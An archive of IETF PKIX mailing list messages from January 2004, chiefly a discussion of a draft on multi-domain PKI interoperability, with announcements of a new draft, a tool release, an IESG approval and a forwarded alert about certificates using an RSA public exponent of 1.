owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.10/8.12.9/Submit) id i0FFoC3h052625; Thu, 15 Jan 2004 07:50:12 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from smtp7.hy.skanova.net (smtp7.hy.skanova.net [195.67.199.140]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0FFo8ib052611 for <ietf-pkix@imc.org>; Thu, 15 Jan 2004 07:50:09 -0800 (PST) (envelope-from anders.rundgren@telia.com) Received: from arport (t10o913p37.telia.com [213.64.27.157]) by smtp7.hy.skanova.net (8.12.10/8.12.10) with SMTP id i0FFnsa7005145; Thu, 15 Jan 2004 16:49:55 +0100 (CET) Message-ID: <000201c3db7e$85bfaf00$0500a8c0@arport> From: "Anders Rundgren" <anders.rundgren@telia.com> To: "Masaki SHIMAOKA" <shimaoka@secom.ne.jp>, "IETF-PKIX" <ietf-pkix@imc.org> Cc: <mpki@jnsa.org> References: <20040107194923.BA44.SHIMAOKA@secom.ne.jp> <20040114194632.05BD.SHIMAOKA@secom.ne.jp> Subject: Re: Revised I-D: Memorandum for multi-domain PKI Interoperability Date: Thu, 15 Jan 2004 16:43:38 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1106 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Masaki, I think you should regard my comments as "reflections" regarding the possible directions PKI may take, not as criticism of your I-D. That is, I envision a rather scattered picture where the private sector and governments will likely select different schemes as they are driven by different motives. For the private sector "cost" and "simplicity" are the prime considerations, not "security". Security unlike most other qualities, is hard to measure and does not even necessarily mean the same thing to everybody when you go outside of pure cryptography. To take an example: A system that requires considerable competence to be deployed may be considered as less secure than a simple one as there is a risk that the competence required is not in place due to lack of availability, or that customers simply cannot afford it. >> I believe your scheme does not address the business model issue, >> i.e. the fact that banks have converted PKI into a transaction system. >Please tell me how this I-D does not meet it. I would not worry too much about this as banks all over the world are trying to introduce PKI systems where the relying parties pay for each status lookup. They usually require that relying parties: - Installs trust network specific (usually NDA protected) licensed software - Signs business contracts with each accepted trust network That is, such PKIs are outside of interoperability concerns as each trust network is effectively isolated from other trust networks. This is very similar to the VISA and MasterCard payment networks. To cope with this, "mediator" service providers "add value" (=charging more money) by offering "standardized" (=proprietary) interfaces as well as a single contract, to relying parties needing access to multiple trust networks. Regarding the private sector's use of PKI, I believe rather little is to be expected as there in spite of decades of "good intentions", is nothing that can be categorized as a ubiquitous, "standard" (industry, de-facto, de-jure, whatever) key container, supported by current operating systems and available from multiple vendors. The so called "soft certificates" often cause more problems than they solve in a corporate environment, and do therefore not challenge the current de-facto client security standard, the user-id/password. This makes me believe that "PKI interoperability" is not exactly on the top of the private sector's menu, they have yet to get PKI to work inside of their organizations. There are of course exceptions, but they are in my opinion just that, exceptions. Regards Anders Rundgren Independent Consultant, PKI and e-Business Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0F2jEib042774; Wed, 14 Jan 2004 18:45:14 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.10/8.12.9/Submit) id i0F2jEhB042773; Wed, 14 Jan 2004 18:45:14 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from iscan01.secomtrust.net (iscan01.secomtrust.net [61.114.177.102]) by above.proper.com (8.12.10/8.12.8) with SMTP id i0F2jBib042768 for <ietf-pkix@imc.org>; Wed, 14 Jan 2004 18:45:12 -0800 (PST) (envelope-from shimaoka@secom.ne.jp) Received: (qmail 4633 invoked by alias); 15 Jan 2004 02:45:13 -0000 Delivered-To: alias-map-ietf-pkix@imc.org@MAP Received: (qmail 4624 invoked by alias); 15 Jan 2004 02:45:12 -0000 Received: from localhost (HELO mail.secomtrust.net) (127.0.0.1) by localhost with SMTP; 15 Jan 2004 02:45:12 -0000 Received: (qmail 2598 invoked from network); 15 Jan 2004 02:45:12 -0000 Received: from unknown (HELO ?172.30.5.54?) (172.30.5.54) by mail with SMTP; 15 Jan 2004 02:45:12 -0000 Date: Thu, 15 Jan 2004 11:45:19 +0900 From: Masaki SHIMAOKA <shimaoka@secom.ne.jp> To: "Anders Rundgren" <anders.rundgren@telia.com> Subject: Re[2]: Revised I-D: Memorandum for multi-domain PKI Interoperability Cc: "IETF-PKIX" <ietf-pkix@imc.org>, <mpki@jnsa.org> In-Reply-To: <012b01c3daa5$1d4b29b0$0500a8c0@arport> References: <20040114194632.05BD.SHIMAOKA@secom.ne.jp> <012b01c3daa5$1d4b29b0$0500a8c0@arport> Message-Id: <20040115102721.05C2.SHIMAOKA@secom.ne.jp> MIME-Version: 1.0 Content-Type: text/plain; charset="ISO-2022-JP" Content-Transfer-Encoding: 7bit X-Mailer: Becky! ver. 2.06.02 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Anders, Thanks for your interesting. Since I suggest single-trust point model, what you felt is my actual intention:) But, I know that many existing PKI is established by (user) trust list model in fact. Generally, almost existing multi-domain PKI is categorized by user trust list model and cross-certification model including hub model, unified domain model and maybe mesh model. Therefore, this I-D tackles that such two models can coexist. This I-D allows that some PKI domain such as public PKI may not have domain policy, and does not prevent using a user trust list model. If your model conflicts with this I-D, let me know concrete issues and insufficient considerations. Although I suggest single-trust point model undoubtedly, I do not prefer a proposal that conflicts with existing model. And the following comments are in-line: On Wed, 14 Jan 2004 14:48:26 +0100 "Anders Rundgren" <anders.rundgren@telia.com> wrote: > > Shimaoka-San, > > I enjoy "playing" with different approaches and I believe that there > is an entirely different approach that this and many existing PKI > architectures will have to compete with, and that is that relying > parties deploy a key-validation service using XKMS. This eliminates > the need for CA cooperation, cross-certification etc. Cross- > certification is probably not very realistic except for in-house > CAs used by governments as commercial entities, have no > reason to vouch for each others issuances. Simple cross-certification model may not meet realistic business. but hub model may meet it. And do not omit unified domain model. Actually some existing PKIs looking like a hierarchy model are formed by a unified domain model. > Another scheme which I even more faith in, is that organizations > only "talk" to each other at the "organization-entity" level, > which reduces the PKI interoperability question by magnitudes. > Not to mention costs. That is, each organizational unit (legal unit etc) > typically purchases a TTP-issued "business unit certificate", mounts > that inside a secure server, and that's it! I am agreeable to such reasonable solution. But this I-D mentions not entity, only interconnection between PKI. > Finally I would like to mention how the Swedish e-government > are tackling PKI interoperability for their C2G activities: > As the outsourced CAs all have different business models, as > well as different signature solutions they are building a "PKI-central" > that does everything from signature validation to signature GUI/web > stuff. Yucky? It probably cant get worse. Or maybe it can... I interest in Swedish e-government PKI. Thanks for your advice. > I recently saw that the Austrian "B|rgercarte" requires that > each user have a local web-server(!) in order to sign due > to the fact that browsers have no such ability. > > I believe your scheme does not address the business model issue, > i.e. the fact that banks have converted PKI into a transaction system. Please tell me how this I-D does not meet it. > > Anders > ----- Masaki SHIMAOKA SECOM Trust.net System Engineering Dpt. Tel: +81 422 91 8498 (ext.3605) Fax: +81 422 45 0536 e-mail: shimaoka@secom.ne.jp Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0ELoxib028560; Wed, 14 Jan 2004 13:50:59 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.10/8.12.9/Submit) id i0ELoxNw028559; Wed, 14 Jan 2004 13:50:59 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from aragorn.bbn.com ([128.33.0.62]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0ELovib028537 for <ietf-pkix@imc.org>; Wed, 14 Jan 2004 13:50:57 -0800 (PST) (envelope-from kent@bbn.com) Received: from [128.89.89.75] (dhcp89-089-075.bbn.com [128.89.89.75]) by aragorn.bbn.com (8.12.7/8.12.7) with ESMTP id i0ELopM9009651; Wed, 14 Jan 2004 16:50:51 -0500 (EST) Mime-Version: 1.0 X-Sender: kent@po2.bbn.com Message-Id: <p0602040ebc2b617885af@[128.89.89.75]> In-Reply-To: <012b01c3daa5$1d4b29b0$0500a8c0@arport> References: <20040107194923.BA44.SHIMAOKA@secom.ne.jp> <20040114194632.05BD.SHIMAOKA@secom.ne.jp> <012b01c3daa5$1d4b29b0$0500a8c0@arport> Date: Wed, 14 Jan 2004 16:47:07 -0500 To: "Anders Rundgren" <anders.rundgren@telia.com> From: Stephen Kent <kent@bbn.com> Subject: Re: Revised I-D: Memorandum for multi-domain PKI Interoperability Cc: "Masaki SHIMAOKA" <shimaoka@secom.ne.jp>, "IETF-PKIX" <ietf-pkix@imc.org>, <mpki@jnsa.org> Content-Type: text/plain; charset="us-ascii" ; format="flowed" X-Scanned-By: MIMEDefang 2.28 (www . roaringpenguin . com / mimedefang) Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Anders, As usual, your comments are provocative. My only comments are: - do not assume that a TTP CA is needed for ANY intra-enterprise PKI; it is not really essential - XKMS is not a panacea; it just moves the problems to a different place in the system. recent bad experiences with the VeriSign crl service should be a lesson about what can happen from undue reliance on a single, central CA - do not assume that whatever banks choose to do re PKI is the right answer for anyone other than banks Steve Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0EKxPib026234; Wed, 14 Jan 2004 12:59:25 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.10/8.12.9/Submit) id i0EKxP8N026233; Wed, 14 Jan 2004 12:59:25 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from osf1.gmu.edu (osf1.gmu.edu [129.174.1.13]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0EKxNib026225 for <ietf-pkix@imc.org>; Wed, 14 Jan 2004 12:59:23 -0800 (PST) (envelope-from pmhesse@geminisecurity.com) Received: from geminiph ([129.174.244.115]) by osf1.gmu.edu (8.8.8/8.8.8) with ESMTP id PAA181344 for <ietf-pkix@imc.org>; Wed, 14 Jan 2004 15:59:15 -0500 (EST) Message-Id: <200401142059.PAA181344@osf1.gmu.edu> From: "Peter Hesse" <pmhesse@geminisecurity.com> To: <ietf-pkix@imc.org> Subject: New version of GUIdumpASN available Date: Wed, 14 Jan 2004 15:59:21 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Mailer: Microsoft Office Outlook, Build 11.0.5510 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165 Thread-Index: AcPa4Ug4aeQhLEZWSEivFjI5XYXVng== Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> All, Since I know a number of you use the tool, I figured I'd let you know that a new version of GUIdumpASN is available. GUIdumpASN is a free Windows-ified version of Peter Gutmann's dumpasn1.c program, and it allows view/print/saving of human readable ASN.1. The new version supports the use of external .CFG files. Additional changes include a send-to icon that works, and it will now remember its settings when you call it via drag and drop. Since we've changed installer programs, you should uninstall your old version, and download the new one from http://www.geminisecurity.com/guidumpasn.html Enjoy. Comments are always welcome. --Peter Hesse +---------------------------------------------------------------+ | Peter Hesse pmhesse@geminisecurity.com | | Phone: (703)934-2031 Gemini Security Solutions, Inc. | | ICQ: 1942828 www.geminisecurity.com | +---------------------------------------------------------------+ "Pay no attention to what the critics say; there has never been a statue set up in honor of a critic." --Jean Sibelius Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0EDrqib085016; Wed, 14 Jan 2004 05:53:52 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.10/8.12.9/Submit) id i0EDrqjA085009; Wed, 14 Jan 2004 05:53:52 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from smtp7.hy.skanova.net (smtp7.hy.skanova.net [195.67.199.140]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0EDroib084973 for <ietf-pkix@imc.org>; Wed, 14 Jan 2004 05:53:50 -0800 (PST) (envelope-from anders.rundgren@telia.com) Received: from arport (t7o913p44.telia.com [213.64.26.44]) by smtp7.hy.skanova.net (8.12.10/8.12.10) with SMTP id i0EDrXmW004437; Wed, 14 Jan 2004 14:53:35 +0100 (CET) Message-ID: <012b01c3daa5$1d4b29b0$0500a8c0@arport> From: "Anders Rundgren" <anders.rundgren@telia.com> To: "Masaki SHIMAOKA" <shimaoka@secom.ne.jp>, "IETF-PKIX" <ietf-pkix@imc.org> Cc: <mpki@jnsa.org> References: <20040107194923.BA44.SHIMAOKA@secom.ne.jp> <20040114194632.05BD.SHIMAOKA@secom.ne.jp> Subject: Re: Revised I-D: Memorandum for multi-domain PKI Interoperability Date: Wed, 14 Jan 2004 14:48:26 +0100 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2800.1106 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> Shimaoka-San, I enjoy "playing" with different approaches and I believe that there is an entirely different approach that this and many existing PKI architectures will have to compete with, and that is that relying parties deploy a key-validation service using XKMS. This eliminates the need for CA cooperation, cross-certification etc. Cross- certification is probably not very realistic except for in-house CAs used by governments as commercial entities, have no reason to vouch for each others issuances. Another scheme which I even more faith in, is that organizations only "talk" to each other at the "organization-entity" level, which reduces the PKI interoperability question by magnitudes. Not to mention costs. That is, each organizational unit (legal unit etc) typically purchases a TTP-issued "business unit certificate", mounts that inside a secure server, and that's it! Finally I would like to mention how the Swedish e-government are tackling PKI interoperability for their C2G activities: As the outsourced CAs all have different business models, as well as different signature solutions they are building a "PKI-central" that does everything from signature validation to signature GUI/web stuff. Yucky? It probably cant get worse. Or maybe it can... I recently saw that the Austrian "Bürgercarte" requires that each user have a local web-server(!) in order to sign due to the fact that browsers have no such ability. I believe your scheme does not address the business model issue, i.e. the fact that banks have converted PKI into a transaction system. Anders ----- Original Message ----- From: "Masaki SHIMAOKA" <shimaoka@secom.ne.jp> To: "IETF-PKIX" <ietf-pkix@imc.org> Cc: <mpki@jnsa.org> Sent: Wednesday, January 14, 2004 11:51 Subject: Re: Revised I-D: Memorandum for multi-domain PKI Interoperability All, As I presented in 57th IETF meeting, I propose to make a consensus for multi-domain PKI interoperability. To consider such consensus, I was writing this I-D, and I finished it. Please review the I-D and let me know your opinion. You can obtain the I-D from: http://www.ietf.org/internet-drafts/draft-shimaoka-multidomain-pki-02.txt Original presentation: http://www.ietf.org/proceedings/03jul/slides/pkix-9/index.html Working Page: http://www.jnsa.org/mpki/#id At 56th IETF, I discussed with Tim how to standardize this I-D. As result, PKIX WG seemed difficult to holding the ID as new WG draft. So I am proposing this as personal draft. shima ----- Masaki SHIMAOKA SECOM Trust.net System Engineering Dpt. Tel: +81 422 91 8498 (ext.3605) Fax: +81 422 45 0536 e-mail: shimaoka@secom.ne.jp Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i0EApWib076270; Wed, 14 Jan 2004 02:51:32 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.10/8.12.9/Submit) id i0EApWfL076269; Wed, 14 Jan 2004 02:51:32 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from iscan01.secomtrust.net (iscan01.secomtrust.net [61.114.177.102]) by above.proper.com (8.12.10/8.12.8) with SMTP id i0EApTib076263 for <ietf-pkix@imc.org>; Wed, 14 Jan 2004 02:51:30 -0800 (PST) (envelope-from shimaoka@secom.ne.jp) Received: (qmail 15840 invoked by alias); 14 Jan 2004 10:51:27 -0000 Delivered-To: alias-map-ietf-pkix@imc.org@MAP Received: (qmail 15832 invoked by alias); 14 Jan 2004 10:51:27 -0000 Received: from localhost (HELO mail.secomtrust.net) (127.0.0.1) by localhost with SMTP; 14 Jan 2004 10:51:27 -0000 Received: (qmail 21220 invoked from network); 14 Jan 2004 10:51:26 -0000 Received: from unknown (HELO ?172.30.5.54?) (172.30.5.54) by mail with SMTP; 14 Jan 2004 10:51:26 -0000 Date: Wed, 14 Jan 2004 19:51:32 +0900 From: Masaki SHIMAOKA <shimaoka@secom.ne.jp> To: IETF-PKIX <ietf-pkix@imc.org> Subject: Re: Revised I-D: Memorandum for multi-domain PKI Interoperability Cc: mpki@jnsa.org In-Reply-To: <20040107194923.BA44.SHIMAOKA@secom.ne.jp> References: <20040107194923.BA44.SHIMAOKA@secom.ne.jp> Message-Id: <20040114194632.05BD.SHIMAOKA@secom.ne.jp> MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Mailer: Becky! ver. 2.06.02 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> All, As I presented in 57th IETF meeting, I propose to make a consensus for multi-domain PKI interoperability. To consider such consensus, I was writing this I-D, and I finished it. Please review the I-D and let me know your opinion. You can obtain the I-D from: http://www.ietf.org/internet-drafts/draft-shimaoka-multidomain-pki-02.txt Original presentation: http://www.ietf.org/proceedings/03jul/slides/pkix-9/index.html Working Page: http://www.jnsa.org/mpki/#id At 56th IETF, I discussed with Tim how to standardize this I-D. As result, PKIX WG seemed difficult to holding the ID as new WG draft. So I am proposing this as personal draft. shima ----- Masaki SHIMAOKA SECOM Trust.net System Engineering Dpt. Tel: +81 422 91 8498 (ext.3605) Fax: +81 422 45 0536 e-mail: shimaoka@secom.ne.jp Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i09LSKib074245; Fri, 9 Jan 2004 13:28:20 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.10/8.12.9/Submit) id i09LSKxX074244; Fri, 9 Jan 2004 13:28:20 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from ietf.org (odin.ietf.org [132.151.1.176]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i09LSGib074239 for <ietf-pkix@imc.org>; Fri, 9 Jan 2004 13:28:18 -0800 (PST) (envelope-from dinaras@cnri.reston.va.us) Received: from CNRI.Reston.VA.US (localhost [127.0.0.1]) by ietf.org (8.9.1a/8.9.1a) with ESMTP id QAA17019; Fri, 9 Jan 2004 16:28:13 -0500 (EST) Message-Id: <200401092128.QAA17019@ietf.org> Mime-Version: 1.0 Content-Type: Multipart/Mixed; Boundary="NextPart" To: IETF-Announce: ; Cc: ietf-pkix@imc.org From: Internet-Drafts@ietf.org Reply-to: Internet-Drafts@ietf.org Subject: I-D ACTION:draft-ietf-pkix-certpathbuild-03.txt Date: Fri, 09 Jan 2004 16:28:13 -0500 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> --NextPart A New Internet-Draft is available from the on-line Internet-Drafts directories. This draft is a work item of the Public-Key Infrastructure (X.509) Working Group of the IETF. Title : Internet X.509 Public Key Infrastructure: Certification Path Building Author(s) : M. Cooper, Y. Dzambasow Filename : draft-ietf-pkix-certpathbuild-03.txt Pages : 74 Date : 2004-1-9 This document was written to provide guidance and recommendations to developers building X.509 public-key certification paths within their applications. By following the guidance and recommendations defined in this document, an application developer is more likely to develop a robust X.509 certificate enabled application that can build valid certification paths across a wide range of PKI environments. A URL for this Internet-Draft is: http://www.ietf.org/internet-drafts/draft-ietf-pkix-certpathbuild-03.txt To remove yourself from the IETF Announcement list, send a message to ietf-announce-request with the word unsubscribe in the body of the message. Internet-Drafts are also available by anonymous FTP. Login with the username "anonymous" and a password of your e-mail address. After logging in, type "cd internet-drafts" and then "get draft-ietf-pkix-certpathbuild-03.txt". A list of Internet-Drafts directories can be found in http://www.ietf.org/shadow.html or ftp://ftp.ietf.org/ietf/1shadow-sites.txt Internet-Drafts can also be obtained by e-mail. Send a message to: mailserv@ietf.org. In the body type: "FILE /internet-drafts/draft-ietf-pkix-certpathbuild-03.txt". NOTE: The mail server at ietf.org can return the document in MIME-encoded form by using the "mpack" utility. To use this feature, insert the command "ENCODING mime" before the "FILE" command. To decode the response(s), you will need "munpack" or a MIME-compliant mail reader. Different MIME-compliant mail readers exhibit different behavior, especially when dealing with "multipart" MIME messages (i.e. documents which have been split up into multiple messages), so check your local documentation on how to manipulate these messages. Below is the data which will enable a MIME compliant mail reader implementation to automatically retrieve the ASCII version of the Internet-Draft. --NextPart Content-Type: Multipart/Alternative; Boundary="OtherAccess" --OtherAccess Content-Type: Message/External-body; access-type="mail-server"; server="mailserv@ietf.org" Content-Type: text/plain Content-ID: <2004-1-9164736.I-D@ietf.org> ENCODING mime FILE /internet-drafts/draft-ietf-pkix-certpathbuild-03.txt --OtherAccess Content-Type: Message/External-body; name="draft-ietf-pkix-certpathbuild-03.txt"; site="ftp.ietf.org"; access-type="anon-ftp"; directory="internet-drafts" Content-Type: text/plain Content-ID: <2004-1-9164736.I-D@ietf.org> --OtherAccess-- --NextPart-- Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i08MRvib030938 for <ietf-pkix-bks@above.proper.com>; Thu, 8 Jan 2004 14:27:57 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.10/8.12.9/Submit) id i08MRv8d030937 for ietf-pkix-bks; Thu, 8 Jan 2004 14:27:57 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from woodstock.binhost.com (woodstock.binhost.com [144.202.240.3]) by above.proper.com (8.12.10/8.12.8) with SMTP id i08MRuib030932 for <ietf-pkix@imc.org>; Thu, 8 Jan 2004 14:27:56 -0800 (PST) (envelope-from housley@vigilsec.com) Received: (qmail 19564 invoked by uid 0); 8 Jan 2004 22:27:44 -0000 Received: from unknown (HELO Russ-Laptop.vigilsec.com) (141.156.213.222) by woodstock.binhost.com with SMTP; 8 Jan 2004 22:27:44 -0000 Message-Id: <5.2.0.9.2.20040108172704.048a6fa8@mail.binhost.com> X-Sender: housley@mail.binhost.com X-Mailer: QUALCOMM Windows Eudora Version 5.2.0.9 Date: Thu, 08 Jan 2004 17:27:54 -0500 To: ietf-pkix@imc.org From: Russ Housley <housley@vigilsec.com> Subject: Fwd: Alert: certs with RSA public key exponent of 1 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> This will also be of interest to this list ... Russ >Date: Thu, 8 Jan 2004 14:08:34 -0800 >From: "Nelson Bolyard" <misterssl@aol.com> >Subject: Alert: certs with RSA public key exponent of 1 >To: "IETF Transport Layer Security WG" <ietf-tls@lists.certicom.com> > >Some time ago, mozilla was modified to detect and reject RSA keys with >public exponents equal to 1. Presumably, the readers of this list >need no explanation of the implications of such keys. > >Now, mozilla users are encountering web sites whose certs have such keys. >At least one public CA has apparently issued one or more such certs. > >I'm reporting this here to alert the readers of this list who may wish >to ensure that their implementations detect such keys, and to suggest >that perhaps the TLS RFC should explicitly forbid the use of any public >keys (RSA or otherwise) that facilitate such weak encryption and/or >authentication by requiring implentations to detect and reject them. > >Nelson (not speaking for my employer) Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i08M90ib029919 for <ietf-pkix-bks@above.proper.com>; Thu, 8 Jan 2004 14:09:00 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.10/8.12.9/Submit) id i08M90Uh029918 for ietf-pkix-bks; Thu, 8 Jan 2004 14:09:00 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from asgard.ietf.org (asgard.ietf.org [132.151.6.40]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i08M8xib029913 for <ietf-pkix@imc.org>; Thu, 8 Jan 2004 14:08:59 -0800 (PST) (envelope-from apache@asgard.ietf.org) Received: from apache by asgard.ietf.org with local (Exim 4.14) id 1AeiH8-0006Jx-St; Thu, 08 Jan 2004 17:05:10 -0500 X-test-idtracker: no From: The IESG <iesg-secretary@ietf.org> To: IETF-Announce:; Cc: Internet Architecture Board <iab@iab.org>, RFC Editor <rfc-editor@rfc-editor.org>, <ietf-pkix@imc.org> Subject: Protocol Action: 'Internet X.509 Public Key Infrastructure Proxy Certificate Profile' to Proposed Standard Message-Id: <E1AeiH8-0006Jx-St@asgard.ietf.org> Date: Thu, 08 Jan 2004 17:05:10 -0500 Sender: owner-ietf-pkix@mail.imc.org Precedence: bulk List-Archive: <http://www.imc.org/ietf-pkix/mail-archive/> List-ID: <ietf-pkix.imc.org> List-Unsubscribe: <mailto:ietf-pkix-request@imc.org?body=unsubscribe> The IESG has approved the following document: - 'Internet X.509 Public Key Infrastructure Proxy Certificate Profile ' <draft-ietf-pkix-proxy-10.txt> as a Proposed Standard This document is the product of the Public-Key Infrastructure (X.509) Working Group. The IESG contact persons are Russ Housley and Steve Bellovin. Technical Summary This document specifies the certificate profile for Proxy Certificates, based on X.509v3 certificate profile in RFC 3280. The term Proxy Certificate is used to describe a certificate that is derived from, and signed by, a normal X.509v3 End Entity Public Key Certificate or by another Proxy Certificate. Working Group Summary The PKIX Working Group came to consensus on this document. Protocol Quality This document was reviewed by Russell Housley for the IESG. RFC Editor Note On page 17, please correct the forward reference. OLD: the IANA registry (see Section Error! Reference source not found NEW: the IANA registry (see Section 7 Add additional text to the end of the IANA Considerations, replacing RFC-TBD with the number assigned to this document, and replacing DATE-TBD with the month and year that this document becomes an RFC. NEW: OID Description Reference --- ----------- --------- 1.3.6.1.5.5.7.21.1 id-ppl-inheritALL [RFC RFC-TBD] 1.3.6.1.5.5.7.21.2 id-ppl-independent [RFC RFC-TBD] REFERENCES ---------- [RFC-TBD] Tuecke, S., V. Welch, D. Engert, L. Pearlman, M. Thompson, "Internet X.509 Public Key Infrastructure Proxy Certificate Profile", RFC RFC-TBD, Argonne National Laboratory, National Center for Supercomputing Applications, University of Southern California/Information Sciences Institute, Lawernece Berkeley National Laboratory, DATE-TBD. Received: from above.proper.com (localhost [127.0.0.1]) by above.proper.com (8.12.10/8.12.8) with ESMTP id i07Gh8ib058693 for <ietf-pkix-bks@above.proper.com>; Wed, 7 Jan 2004 08:43:08 -0800 (PST) (envelope-from owner-ietf-pkix@mail.imc.org) Received: (from majordom@localhost) by above.proper.com (8.12.10/8.12.9/Submit) id i07Gh8Qu058692 for ietf-pkix-bks; Wed, 7 Jan 2004 08:43:08 -0800 (PST) X-Authentication-Warning: above.proper.com: majordom set sender to owner-ietf-pkix@mail.imc.org using -f Received: from woodstock.binhost.com (woodstock.binhost.com [144.202.240.3]) by above.proper.com (8.12.10/8.12.8) with SMTP id i07Gh7ib058683 for <ietf-pkix@imc.org>; Wed, 7 Jan 2004 08:43:07 -0800 (PST) (envelope-from housley@vigilsec.com) Received: (qmail 11776 invoked by uid 0); 7 Jan 2004 16:42:55 -0000 Received: from unknown (HELO Russ-Laptop.vigilsec.com) (141.156.181.82) by woodstock.binhost.com with SMTP; 7 Jan 2004 16:42:55 -0000 Message-Id: <5.2.0.9.2.20040107113512.02cefe90@mail.binhost.com> X-Sender: housley@mail.binhost.com X-Mailer: QUALCOMM Windows Eudora Version 5.2.0.9 Date: Wed, 07 Jan 2004 11:36:06 -0500 To: "Kaliski, Burt" <BKaliski@rsasecurity.com>, "'wpolk@nist.gov'" <wpolk@nist.gov>, ietf-pkix@imc.org From: Russ Housley <housley@vigilsec.com> Subject: RE: WG Last Call: Additional Algorithms for RSA cryptography Cc: "'Stephen Kent'" <kent@bbn.com>, jimsch@exmsft.com, Jim Schaad <jimsch@nwlink.com> In-Reply-To: <F504A8CEE925D411AF4A00508B8BE90A056946ED@exna07.securitydy namics.com> Mime-Version: 1.0 